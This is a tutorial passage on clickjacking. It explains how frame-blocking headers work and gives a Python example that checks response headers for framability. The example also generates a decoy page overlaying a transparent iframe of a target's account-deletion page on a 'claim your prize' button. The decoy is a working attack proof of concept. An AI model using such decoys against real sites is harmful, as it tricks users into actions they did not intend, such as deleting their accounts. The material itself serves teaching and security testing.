Clickjacking
Clickjacking is an interface-based attack in which a user is tricked into clicking actionable content on a hidden website by clicking some other content on a decoy website. The attacker loads the target page in an invisible frame laid over the decoy, so the victim's click lands on the target's real button while the victim believes they are interacting with the decoy.
Exploitation
Clickjacking attacks are possible whenever websites can be framed. Whether a website can be framed is determined by its response headers: the page can be framed if the response carries neither an X-Frame-Options header (DENY or SAMEORIGIN) nor a Content-Security-Policy header containing a frame-ancestors directive.
Two caveats matter when reading the headers. A Content-Security-Policy header that has no frame-ancestors directive does not restrict framing at all, and a Content-Security-Policy-Report-Only header only reports violations without blocking anything. When both X-Frame-Options and a CSP with frame-ancestors are present, browsers enforce frame-ancestors and ignore X-Frame-Options.
We examine the response headers of the target, for example with curl -I or in the Network tab of the browser's developer tools.
The response contained neither an X-Frame-Options header nor a Content-Security-Policy header, which means the site can be framed and so any page on it that exposes a state-changing control is a clickjacking target. Note that the attack also relies on the victim's session cookie being sent with the framed request; a session cookie marked SameSite=Lax or Strict is not sent when the page is loaded in a cross-site frame, which defeats the attack even when framing is allowed.
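The following added example (not code from the original page) turns the header check above into a function that decides whether a page served with a given set of response headers would render in a frame on a given attacker origin, handling the caveats just described: a CSP without frame-ancestors, X-Frame-Options SAMEORIGIN versus DENY, and frame-ancestors taking precedence over X-Frame-Options. It also builds the decoy page used to exploit a framable target. The header sets, origins and URLs are constructed for illustration; the source matching is a simplified version of the CSP algorithm (no path matching, ports compared literally).

```python
"""Added example: decide from HTTP response headers whether a page can be framed,
and build the decoy page a clickjacking proof of concept uses.
All headers and origins below are constructed samples, not real captures."""
from typing import Dict, List, Optional, Tuple


def _header(headers: Dict[str, str], name: str) -> Optional[str]:
    """Case-insensitive header lookup (header names are case-insensitive on the wire)."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return None


def frame_ancestors(csp: str) -> Optional[List[str]]:
    """Return the source list of the frame-ancestors directive, or None when the
    policy has no such directive (a CSP without it does not restrict framing)."""
    for directive in csp.split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return tokens[1:]
    return None


def _split_origin(origin: str) -> Tuple[str, str]:
    """'https://Host:8443/x' -> ('https', 'host:8443')."""
    scheme, _, rest = origin.lower().partition("://")
    return scheme, rest.split("/")[0]


def _ancestor_allowed(sources: List[str], page_origin: str, framer_origin: str) -> bool:
    """Simplified CSP source matching for frame-ancestors: 'none', 'self', *,
    scheme-only sources (https:) and host sources with an optional *. wildcard."""
    f_scheme, f_host = _split_origin(framer_origin)
    for raw in sources:
        src = raw.strip("'").lower()
        if src == "none":
            return False
        if src == "self" and _split_origin(page_origin) == (f_scheme, f_host):
            return True
        if src == "*":
            return True
        if src.endswith(":") and "/" not in src:            # scheme-only source, e.g. https:
            if f_scheme == src[:-1]:
                return True
            continue
        # Host source; a scheme-less host is taken to match the framer's scheme.
        s_scheme, s_host = _split_origin(src) if "://" in src else (f_scheme, src)
        if s_scheme != f_scheme:
            continue
        if s_host.startswith("*."):
            if f_host.endswith(s_host[1:]):                 # *.partner.example
                return True
        elif s_host == f_host:
            return True
    return False


def can_be_framed(headers: Dict[str, str], page_origin: str, framer_origin: str) -> bool:
    """True if a response carrying these headers would render inside a frame on a
    page served from framer_origin, i.e. the target is exposed to clickjacking there."""
    csp = _header(headers, "Content-Security-Policy")
    if csp is not None:
        sources = frame_ancestors(csp)
        if sources is not None:
            # With frame-ancestors present, browsers enforce it and ignore X-Frame-Options.
            return _ancestor_allowed(sources, page_origin, framer_origin)
    xfo = _header(headers, "X-Frame-Options")
    if xfo is not None:
        value = xfo.strip().upper()
        if value == "DENY":
            return False
        if value == "SAMEORIGIN":
            return _split_origin(page_origin) == _split_origin(framer_origin)
        # ALLOW-FROM was never supported by Chrome and was dropped by Firefox, and
        # unrecognised values are ignored, so anything else gives no protection.
        return True
    return True  # no framing policy at all: the page can be framed from anywhere


def decoy_page(target_url: str, top: int, left: int, opacity: float = 0.0001) -> str:
    """Classic clickjacking decoy: a visible bait button with the target page laid
    over it in a near-transparent iframe. top/left shift the frame so the target's
    real button sits exactly over the bait; z-index keeps the frame on top."""
    return f"""<!doctype html>
<html><head><style>
  #target {{ position:absolute; top:{top}px; left:{left}px; width:700px; height:600px;
             opacity:{opacity}; z-index:2; border:0; }}
  #decoy  {{ position:absolute; top:300px; left:60px; z-index:1; font-size:24px; }}
</style></head>
<body>
  <button id="decoy">Click to claim your prize</button>
  <iframe id="target" src="{target_url}"></iframe>
</body></html>"""


# Constructed sample responses used for the checks below.
NO_POLICY = {"Content-Type": "text/html", "Server": "nginx"}
CSP_WITHOUT_FRAME_ANCESTORS = {"Content-Security-Policy": "default-src 'self'"}
CSP_PARTNER = {"Content-Security-Policy":
               "default-src 'self'; frame-ancestors 'self' https://*.partner.example"}
XFO_SAMEORIGIN = {"X-Frame-Options": "SAMEORIGIN"}
XFO_DENY = {"x-frame-options": "DENY", "Content-Security-Policy": "default-src 'none'"}

if __name__ == "__main__":
    target, attacker = "https://shop.example", "https://evil.example"
    for name, hdrs in [("no policy", NO_POLICY), ("CSP w/o frame-ancestors", CSP_WITHOUT_FRAME_ANCESTORS),
                       ("CSP frame-ancestors", CSP_PARTNER), ("XFO SAMEORIGIN", XFO_SAMEORIGIN),
                       ("XFO DENY", XFO_DENY)]:
        print(f"{name:24s} framable from {attacker}: {can_be_framed(hdrs, target, attacker)}")
    print(decoy_page(target + "/account/delete", top=-250, left=-30))
```

The two "CSP present" cases are the ones worth internalising: a policy such as default-src 'self' looks protective in a header dump but leaves the page framable, while frame-ancestors 'self' https://*.partner.example blocks the attacker's origin yet still admits the listed partner domains, so a compromised partner host would be a viable framing origin.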